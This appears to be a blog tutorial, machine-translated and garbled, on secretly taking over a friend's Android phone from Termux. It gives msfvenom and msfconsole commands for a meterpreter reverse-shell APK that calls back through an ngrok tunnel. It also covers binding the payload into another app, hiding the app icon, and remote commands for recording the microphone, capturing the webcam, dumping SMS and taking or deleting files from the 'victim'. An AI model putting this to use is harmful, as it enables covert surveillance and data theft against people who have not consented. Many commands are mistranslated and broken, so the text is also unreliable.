recent
أخبار ساخنة

Control Your Friends Phone By Termux

This is the Explenation about controling your friends Android Devices By Termux
[+] Index:
[Definition of terms and tools we use]
[Initial simplified explanation]
[Termex download link]
[Termix Basics]
[Download the WhatsAppLite]
[Download Negrok]
[Explanation of Port Negrok Open]
[Solve not to open Port]
[Making a pilot application from meta]
[Opening an application listening session]
[Download injector apps]
[Injecting a pilot into an application]
[Details on the injector]
[Opening an application listening session]
[Health device control orders]
[1] Definition of terms and tools that we use
[+] The first term
[1] Port Port
[=] Outlet or window to connect two things
[+] The second term
[2] Bailod pyload
[=] A payload that is sent to the victim to open a secret port or door in the device that allows the hacker to infiltrate the device
[+] The third term
[3] listening session
[=] A place to send and receive orders and files from your device to the victim's device and vice versa
[+] The first script
[1] MetaSplot | Dead metasploit
[=] It is a library of tools, and databases for a set of vulnerabilities that are discovered
[+] The second script
[2] Najruk ngrok
[=] Tool opening Port
[+] The third script
[3] Temex
[=] Tool to inject pods into applications
[+] The fourth script
[4] Exploiting Android Stagefright
[=] Video injection and video breach
[-] is over.
[2] A simplified first explanation
[+] In order to penetrate a device first, we must text the text of the biodegradable in order to send it to the victim, then we open a listening session and connect the podd and the eavesdropping session using Port
[-] is over.
[3] Termex Download Link
[+] Google Play download link:
[-] https://play.google.com/store/apps/details?id=com.termux
[-] is over.
[4] Basics of Thermex
[+] Open Termex
[+] Type the following commands:
[1] temporary storage
[2] pkg -y update
[3] pkg -y upgrade
[4] Install pkg git -y
[5] Install pkg python -y
[6] Install pkg python2 -y
[7] Install pkg curl -y
[8] Install pkg wget -y
[9] Install rkg -y rkg
[10] Install pkg perl -y
[11] Install pkg proot -y
[-] is over.
[5] Downloading Metalsploit
[+] Open Termex
[+] Type the following commands:
[1] Gate clone
https://github.com/rapid7/metasploit-framework.git
[4] metaaploit-cd framework
[5] Install a rake package -12.3.1
[6] build.nokogiri configuration package - usage system - libraries
[7] The nokogiri fixation jewel
[8] Fixing gems pkg-config -v rake-12.3.1
[9] Installing the rake package - 12.3.1
[-] is over.
[6] Download Ngrok
[1] Enter the following link, which is the main Najruk website:
[X] https://ngrok.com
[2] Click on the registration word in red to register a new account
[3] Fill out the following fields displayed on the site:
[+] Your name Your Name
[+] Your email Your email
[+] Confirm email Retype your email
[+] Password | password
[+] Take the CAPTCHA test
[+] Click on Register
[+] Logon explanation expired
[4] Go down and we will find 4 squares
[+] First box: download ngrok
[+] Second box: Decompress to install
[+] Third box: Confirm your account
[+] Fourth box: Launch it
[-] We will only need the first and the third
[5] We press the first shocking and the download will start
[-] After downloading:
[+] Enter Thermex
[1] cd / sdcard / download
[+] The command to enter the internal memory / downloads file
[2] cp ngrok-stable-linux-arm.zip $ HOME
[+] The command to copy the Najruk file to Hom
[3] cd $ HOME
[+] Entry order for Home
[4] unzip ngrok-stable-linux-arm.zip
[+] Decompress the Ngrok file
[5] rm ngrok-stable-linux-arm.zip
[+] Command to delete the zip file
[!] Enter the site and go to the third square, you will find a long icon in white line and a black background, copy it
[+] Go to termex
[6] Glue the symbol
[-] is over.
[7] Explanation of the Port Negrok opening
[+] Entry into Termex
Signboard
[1] cd $ HOME
[2] ./ngrok tcp [port]
[!] It is preferable to open Port 4444 or 8080
[°] Example: ./ngrok tcp 4444
[!] How to make sure that the port is open
[+] The word appears on the Internet in green
[-] is over.
[8] The solution of not opening Port
[+] Go to Termex
[1] Convenient update
[2] Convenient upgrade
[3] Installing pkg proot
[4] termux-chroot
[-] If it does not work:
[+] VPN did
[-] If it does not work:
[+] Change Termex update
[-] If it does not work:
[-] The problem is not with the method, the problem will be from the service provider. Some companies do not allow the opening of ports in the network
[-] is over.
[9] Manufacture a pilot application made of meta
[+] Enter Thermex
[+] Opening Port and Copying the Open Port
[1] cd $ HOME / metasploit-framework
[2] msfvenom -p android / meterpreter / reverse_tcp LHOST = tcp: //0.tcp.ngrok.io LPORT = $ port -o /sdcard/$name.apk
[+]
$ Port place, open port
[+] Place $ name, name the application
[!] The port will be created and moved to the main page from the internal memory
[-] is over.
[10] Opening an application listening session
[+] Go to Termex
[1] cd / $ HOME / metasploit-framework
[2]. / msfconsole
[3] Use exploit / multi-processor
[4] Set android / meterpreter / reverse_tcp payload
[5] Designation lhost tcp: //0.tcp.ngrok.io
[6] $ port lport assignment
[7] Exploiting -x hide_app_icon
[+] Send the application to the victim
[-] is over.
[11] Download injector applications
[+] Injector script name is temux-bunch
[+] Entry into Termex
[1] Clone portal https://github.com/Hax4us/Tmux-Bunch
[2] cd $ HOME
[3] cd Tmux-Bunch
[4] chmod + x ./setup
[5]. / setup
[-] is over.
[12] Injected biodegradable application
[+] We put the application to be injected into the main page of the internal memory
[+] We open Port in the network
[+] Entry into Termex
[1] cd / sdcard
[2] mv $ name.apk $ HOME
[3] cd $ HOME
[4] mv $ name.apk temux-bunch
[5] cd tmux-bunch
[6] mv $ name.apk binder
[7] ./tmuxbunch
[8] 6
[9] 1
[10] tcp: //0.tcp.ngrok.io
[11] $ port
[12] $ name
[13] Press Inter twice
[14] 10
[15] Inter
[16] cd embout
[17] mv $ name.apk $ HOME
[18] cd .. \ ..
[19] mv $ name.apk / sdcard
[+] You will find the application on the main page of the internal memory
[-] is over .
[13] Details of the injector
[+] Sometimes the injector will not be able to inject the blood into the application because the application is protected
[14] Opening session wiretap application download application
[+] Go to Termex
[1] cd / $ HOME / metasploit-framework
[2] ./msfconsole
[3] use exploit / multi / handler
[4] set payload android / meterpreter / reverse_tcp
[5] set lhost tcp: //0.tcp.ngrok.io
[6] set lport $ port
[7] exploit -x hide_app_icon
[+] Send the application to the victim
[-] is over .
[15] Control orders for the victim's device
[1] reboot
[=] To restart the victim's device
[2] shultdown
[=] To turn off the victim's device
[3] screenshot
[=] To film the victim’s screen
[4] ps
[=] To show the running programs on the victim's device
[5] upload /sdcard/$name.apk \ $ name.apk
[=] To send a program or commission to the victim's device
[6] download $ name.apk
[=] To download a file from the victim's device to your computer
[7] cd / sdcard
[=] To access the victim's files
[8] rm $ name.name
[=] To delete a file from the victim's device
[9] record_mic -d $ s
[=] To record a victim's voice
[°] $ s represents the number of seconds of recording
[10] webcam_snap
[=] Shoot from the front camera
[11] webcam_stream -d $ s
[=] To shoot video from the front camera
[+] dump_sms
[=] To show SMS messages
[+] cd $ file
[°] $ file is the file name
[=] To access a specific file
[+] cd ..
[=] To return to the previous file
[+] cd / sdcard1
[=] To access the external memory
[-] is over .
Spread and do not steal, you will enjoy the explanation

Search This Blog

تابعنا على الشبكات الاجتماعية

فيديو

تابعنا على الفيسبوك

google-playkhamsatmostaqltradent